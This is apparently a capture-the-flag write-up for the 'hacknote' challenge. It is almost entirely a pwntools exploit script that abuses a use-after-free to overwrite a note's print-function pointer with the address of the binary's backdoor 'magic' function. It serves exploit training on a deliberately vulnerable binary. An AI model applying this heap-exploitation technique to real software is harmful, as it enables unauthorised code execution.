比较简单,直接留了后门! exp
from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add_note(size, context): p.sendlineafter('choice :', str(1)) p.sendlineafter('size :', str(size)) p.sendafter('Content :', context) def delete_note(idx): p.sendlineafter('choice :', str(2)) p.sendlineafter('Index :', str(idx)) def print_note(idx): p.sendlineafter('choice :', str(3)) p.sendlineafter('Index :', str(idx)) proc_name = './hacknote' p = process(proc_name) # p = remote('node3.buuoj.cn', 27556) elf = ELF(proc_name) magic_addr = elf.sym['magic'] add_note(0x16, b'a') # 0 add_note(0x16, b'a') # 1 delete_note(0) delete_note(1) add_note(0x8, p32(magic_addr)) # 2 0 print_note(0) p.interactive()